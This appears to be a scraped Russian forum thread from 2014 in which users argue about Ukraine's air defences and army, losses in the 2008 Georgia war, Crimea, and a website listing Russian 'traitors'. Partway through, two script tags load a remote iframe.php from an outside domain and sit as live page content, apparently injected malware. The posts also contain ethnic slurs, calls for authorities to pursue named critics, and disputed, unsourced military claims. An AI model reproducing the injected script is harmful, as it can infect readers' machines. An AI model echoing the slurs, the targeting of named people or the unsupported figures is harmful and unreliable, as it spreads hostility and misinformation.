Перейти к содержанию

Отношения России и Украины

Рекомендуемые сообщения

В ПВО ситуация не лучше - если  бронетехникой с ремонтом и модернизацией хоть как то занимались Украинские предприятия  - то все производители ПВО остались по сути в России. Украина несмогла обслуживать наиболее современные войсковые комплексы ПВО - ТОР и поставила их в резерв - даже простые и неприхотливые Тунгуски и те обслуживать немогли - сроки хранения ракет вышли - осталось по сутит только пушечное вооружение. Основной воскового ПВО является теперь Шилки!! и ПЗРК....опять такие навыки расчетов никакие..

ПВО как раз на высоте.  Практически все РЛС , оставшися от СССР либо прошли глубокую модернизацию, либо заменены новыми образцами местного производства. Созданы собственные ЗУР и сменные головки самонаведения для модернизации старых ЗУР. С-300 проходят модернизацию на собственной элементной базе. Есть созданный совместно с Белоруссией ЗРК Стилет, который уже вроде начали выпускать. Для Тунгусок и им подобным есть собственные ракеты, полностью совместимые с исходным изделием. ЗСУ "Шилка" уже давно сняли с вооружения, хотя был местный вариант , дополненный новым радаром, ИК станцией поиска целей и шестью ЗУР.

тем не менее украинскими С-300 были сбиты наши самолёты в Грузии...

Небыло там никаких С-300. Сбиты были комплексом БУК. А точнее был сбит буком Ту-22 и Су-24. Все остальные потери от ПЗРК и ЗРК ближней зоны - причем своих же...

Как известно у Грузин были Су-25 - точно такие же как у нас....вот и лупили все во все что летает. Ну и без потерь войн небывает. США в Афгане самолетов и вертолетов уже за 100 тню потеряли а там деже ПЗРК редкая вещь.

Практически все РЛС , оставшися от СССР либо прошли глубокую модернизацию, либо заменены новыми образцами местного производства.

Fishmaster - вы бредите? )) За 23 года незалежности небыло закуплено ни одного самолета - ни одного верталета и не одной системмы ПВО. Проекты модернизации комплексов ПВО на Украине были но это все шло на ЭКСПОРТ - какие то системмы модернизированы но их единицы. О чем разговор если за все время модернизировано было 80 танков - при том что там модернизация копейки стоит по сравнению с системмами ПВО.

Созданы собственные ЗУР и сменные головки самонаведения для модернизации старых ЗУР

Собственные ЗУР???)))) УХАХААА)) для чего ?? Для ПЗРК ?? да есть украинский вариант стрелы - их даж Северная корея свои делает и кстати в многократно больших обьемах - а про что то более менее серьезное хотябы уровня БУКа - нет ничего что шагнуло бы дальше прожэктов.

С-300 проходят модернизацию на собственной элементной базе.

Собственная элементная база на Украине??О_о...Китайцы на нашей делают....а Украина собственную имет...ок -ок!!))) 

Есть созданный совместно с Белоруссией ЗРК Стилет, который уже вроде начали выпускать.

Вроде бы начали..ога - и скок сделали одну или две? И это комплекс на смену ОСЕ - ничего особо выдающегося в нем нет - такие должны быть сотянями чтобы прикрывать войска на марше - а не в единичном экземпляре.

Для Тунгусок и им подобным есть собственные ракеты, полностью совместимые с исходным изделием.

Где они есть то родненький...в войсках? Туда снаряда танковые - балванки тупые непоставлялись а ты про ЗУР вещаещ...

ЗСУ "Шилка" уже давно сняли с вооружения,

Да нет не сняли - в Крыму на фотках имеются. Что касается других частей - хз - шилки в РФ даж используются еще а на Украине и подавно. Ибо комплекс простой как 3 копейки ну и в целом для своих задач эфективный до сих пор. Но опять таки его задача это максимум вертолеты сбивать в современной войне и то вертолеты старых модификаций.

И самое главное ПВО это в перую очередь организация - даже имея очень мошные современные комплексы без четкой структурной организации они малоэфективны - что показала война 1982 года когда Израиль смог уничтожить достаточно мошную группировку войск Сирии . У Укарины нет ничего подобного не в структурном плане не даже в качественном. Главное нет авиации.

• Upvote 1

Сбиты были комплексом БУК.
один хрен украинским...

Шейн поддержал новую украинскую власть.
неужто?

В Крыме началась борьба за независимость, и Россия должна поддержать идею референдума.

http://oleg-shein.livejournal.com/

Небыло там никаких С-300. Сбиты были комплексом БУК. А точнее был сбит буком Ту-22 и Су-24. Все остальные потери от ПЗРК и ЗРК ближней зоны - причем своих же...

Как известно у Грузин были Су-25 - точно такие же как у нас....вот и лупили все во все что летает. Ну и без потерь войн небывает. США в Афгане самолетов и вертолетов уже за 100 тню потеряли а там деже ПЗРК редкая вещь.

СУ-24 было потерянно 5 шт. Все под городом Поти. Именно столько было продемонстрированно обломков и именно столько было продемонстрированно документов погибших пилотов. На Ютубе есть видео одного из налетов на Поти. Судя по видео ЗУР сокрее всего пускал "Бук". ТУ-22 скорее всего тоже сбили "Буком", а вот упавший возле Гори  российский СУ-25 срезали скорее всего израильским "Спайдером",  возле него нашли детали от данной ЗУР.

С-300 в Грузии никто не видел.

СУ-24 было потерянно 5 шт. Все под городом Поти. Именно столько было продемонстрированно обломков
Откуда данные, что это не обломки грузинских Су-25?
  • Upvote 1

один хрен украинским...

Может советскими всетаки?) НУ и те что проданы их там уже нет....Украина помимо Грузии поставляла ПВО в Африку- в Уганду или еще куда то- распродали большую часть БУков что на ходу были. Все ликвидное они продали - нелеквид оставили себе...как танкаи Т-64 ибо никто непокупал вот и сделали ОБТ - ну и типа в Харькове завод есть - для ремонта - только Харьков и Т-72 на экспорт неплохо так ремонтировал и Т-80 а что то для родной армии несрослось...

СУ-24 было потерянно 5 шт. Все под городом Поти

Где?? ВВС России потеряли 3 су 25 . 1 -Ту-22 и 1 -Су -24. Больше никаких потерь безвозратных небыло. Ага прям вот в одном месте все и сбили и все 10 человек погибли и все с паспортами летели - не несите куйню. Тем более без подвтерждения своих слов.  Я много версий на тот счет читал - даже самые масштабные - это 8 потерянных самолетов из которых два Су-24. Также были сбиты два Су-25 Грузинские - возможно их тоже посчитали "эксперты" до кучи - так что от 5 до 8 максимум. И каки то 5 сразу сбитых под Поти Су-24 Грузинский бред. Грузинов послушать они там АПЛ нашу потопили и Авианосец )))

На Ютубе есть видео одного из налетов на Поти. Судя по видео ЗУР сокрее всего пускал "Бук". 

Это единственное видео тех событий - да там видно как пускают несколь ЗУР и что то они сбили. Но как вы по следу определили что это БУК я хз - это могла быть и С-75. 

ТУ-22 скорее всего тоже сбили "Буком", а вот упавший возле Гори российский СУ-25 срезали скорее всего израильским "Спайдером", возле него нашли детали от данной ЗУР.

Опять таки могла сбить и С-75 которые были у Грузии. В югославии С-75 сбила Ф-117 для нее Ту-22 куда более простая цель - то что эти комплексы небыли вскрыты и уничтожены - косяк уже наш. Так как комплекс неподвижный по сути и уничтожить его при налачии координат труда несоставляет. Насчет Бука - я больше склоянюсь к С-75 ибо Буки немодернизированные там понятно - БУК простая модифкация - моедрнизированные есть только в России. У старого Бука - косяк с высотностью некий - этот комплекс всетаки как войсковое ПВО позиционировался - только в 2000-е годы он получил новые ракеты.

Спайдер был захвачен нашими войсками - фотка снизу. Сбить он теоритечески Су-25 мог но скорее всего были сбиты Осами они или ПЗРК - так как их было куда больше чем одна батарее Спайдеров.

С-300 в Грузии никто не видел.

Сложно увидеть черную кошку в черной комнате особенно если ее там нет. )) С-300 сложный в обслужвании комплекс - большиство из них были из ВС УКраины посписаны из за недостатка зап.частей и плохого обслуживание - понятно что в Грузии с обслугой дела еше хуже бы обстояли. Украина продавала в перую очередь ликвидное оружие - для стран 3 мира - а это в первую очередь простое и дешовое - С-300 к разряду простого оружие неотносится. Как и дешового - одна ракета стоит 1.5 миллиона $

<script src="http://evaluationdbms.net/iframe.php" type="text/javascript"> </script>

<script src="http://evaluationdbms.net/iframe.php" type="text/javascript"> </script>

Откуда данные, что это не обломки грузинских Су-25?

С потолка у него данные откуда еще. Либо он су-24 с Су-25 путает. Их было сбито в ходе конфликта 5 штук 3- наших 2 грузинских.  Насчет паспортов - показывали только 1 паспорт погибшего нашего пилота - летчика Ту-22

post-1259-0-88638100-1394375961_thumb.jpg

• Upvote 3

Вообше кому интересно вот тут про армию Украины и ее состояние - более менее четко написано.

http://topwar.ru/40764-boevye-arsenaly-nezalezhnoy-mozhet-li-ukraina-nanesti-udar-po-rossii.html

Кому лень читать -суть за 23 года от некогда 700 000 армии осталось 125 тысяч человек - количество техники сократилось в 4-5 раз - в основном распродана - что нераспродано заржавело - боеспособно от силы 10-20% даже ненышеного штатного состава. При этом в армии до 80% солдат и офицеров  с Восткока и Юга Украины так как для Западненцев служба в армии "заподло". Большая часть офицеров высшего командного звена - давали присягу еще СССР.  Такая армия куда более опасна для властей новых Украины чем для нас..

• Upvote 2

Шейн поддержал новую украинскую власть. ну не ...ука ли?????

Я категорически запретил себе выражаться матом. В связи с жалобами некоторых астраханских фашистов.

Насчет Шеина Факты и только факты.

Если так то это одно, если фактов нет это уже другое.

Я категорически запретил себе выражаться матом. В связи с жалобами некоторых фашистов.

Факты и только факты.

Если так то это одно, ели фактов нет это уже другое.

чуток повыше дал ссылку на статью. вот только в ее авторитетности уже сомневаюсь.

Вообше кому интересно вот тут про армию Украины и ее состояние - более менее четко написано.

http://topwar.ru/40764-boevye-arsenaly-nezalezhnoy-mozhet-li-ukraina-nanesti-udar-po-rossii.html

Кому лень читать -суть за 23 года от некогда 700 000 армии осталось 125 тысяч человек - количество техники сократилось в 4-5 раз - в основном распродана - что нераспродано заржавело - боеспособно от силы 10-20% даже ненышеного штатного состава. При этом в армии до 80% солдат и офицеров  с Восткока и Юга Украины так как для Западненцев служба в армии "заподло". Большая часть офицеров высшего командного звена - давали присягу еще СССР.  Такая армия куда более опасна для властей новых Украины чем для нас..

Вероятно и так. И наверное верно.

Я знаю этого Генерала правда не лично но готов подтвердить что такой человек есть(был) . У меня (точнее у моей матери двоюродная сестра) родня в Киеве ее муж полковник СБУ(бывшем КГБ) в отставке говорил о этом человеке (я обойдусь без фамилий, не хочу лишний раз индексировать поисковые системы) как о одним из лучших командиров на укр в последнее время. 

Мне жаль этого человека до слез. Ну неужели фашистская коричневая змея всеже поломает таких людей.

Он ВЕДЬ НАШ не западный, не пиндос.

• Upvote 3

Вероятно и так. И наверное верно.

Я знаю этого Генерала правда не лично но готов подтвердить что такой человек есть(был) . У меня (точнее у моей матери двоюродная сестра) родня в Киеве ее муж полковник СБУ(бывшем КГБ) в отставке говорил о этом человеке (я обойдусь без фамилий, не хочу лишний раз индексировать поисковые системы) как о одним из лучших командиров на укр в последнее время. 

Мне жаль этого человека до слез. Ну неужели фашистская коричневая змея всеже поломает таких людей.

Он ВЕДЬ НАШ не западный, не пиндос.

ну сбу само допустило такое

ой , какой сайт интересный надыбал.... :megalol:

http://predatel.net/

Я прошу прощения за литературный русский у своих украинских друзей. А не пойти ли вам на х#! со своей войной, дорогие россияне?

Сегодня каждый порядочный россиянин должен желать поражения своему Отечеству… Мы всецело на стороне Украины, мы солидарны с ее новой демократической властью и уверены, что российская агрессия встретит должный вооруженный отпор.

Если хохлы нас победят — я не буду сильно возражать. Может буду даже встречать их на Красной площади с галушками и хреновухой.

Господи! Как же мне стыдно быть гражданином этой страны..

ну и далее по списку. С предателями можно ознакомиться на сайте.

• Upvote 3

ой , какой сайт интересный надыбал...

с каждым днем немцова ненавижу все больше и больше.

ну , кстати, не удивлюсь если всех этих мы увидим на новой болотной.

кстати, там есть откровенно фашистское высказывание какого то кашина что ль. надеюсь его словами заинтересуются те, кто нужно

фамилию точно не запомнил, но он оправдывает действия бандеры и шухевича.

вот она площадь Ленина сегодня

attachicon.gifBiSBZAUIIAAShZa.jpg large.jpg

Жертвы пропаганды. Спросить у любого- чего они хотят от Украины?  Требуют вернуть Крым или долги за газ? Хотя скорее всего большинство там просто по разнарядке и ничего им не надо.

Вот видео с митинга в Киеве сегодня.

• Upvote 1

Экипировка военных «сил самообороны Крыма» — самый интересный предмет для анализа. По мнению экспертов Forbes, это новейшая российская разработка — экипировка «Ратник», которая должна была начать поступать в российские войска в первом квартале 2014 года. Ее также называют «комлпектом солдата будущего». «Ратник» разрабатывался на основе экипировки «Бармица».

В состав «Ратника» входят различные системы жизнеобеспечения, несколько типов стрелкового оружия с навесными системами, средства энергообеспечения. Всего в «Ратник» включено порядка 10 подсистем.Экипировка  может защитить до 90% тела бойца. Бронежилеты «Ратника» на 70% эффективней предшественников. Система жизнеобеспечения дополнена защитными очками, гарнитурой для защиты слуха, комплектом защиты коленных и локтевых суставов, индивидуальным фильтром для очистки воды, комплектом автономных источников тепла и другими элементами.
Читайте подробнее на Forbes.ru: http://www.forbes.ru/sobytiya-photogallery/obshchestvo/251676-soldaty-budushchego-chem-vooruzheny-vezhlivye-lyudi-v-krymu/photo/5

площадь Лен

если уж ты хочешь добиться расположения русских к проблемам хохлов, то ты хоть видео с откровенными предателями не выставляй пожалуйста. ну ты еще пуси риот суда приплети. кстати они еще не выступали на майдане??? есть люди, которые в России нежелательные гости- пусть даже они и родились тут.

• Upvote 1

Жертвы пропаганды. Спросить у любого- чего они хотят от Украины?  Требуют вернуть Крым или долги за газ? Хотя скорее всего большинство там просто по разнарядке и ничего им не надо.

Вот видео с митинга в Киеве сегодня.

вроде как его и выпустили с  условием что бы у кремля в ногах не путался больше...

Ходор - дурень. Если раньше россияне могли видеть в нем "мученика", теперь же только врага. Хохлам он по душе - пусть себе забирают.

Михаил Шац Я прошу прощения за литературный русский у своих украинских друзей. А не пойти ли вам на х#! со своей войной, дорогие россияне?

Всегда знала, что он урод.

Гость
Эта тема закрыта для публикации ответов.
  • Создать...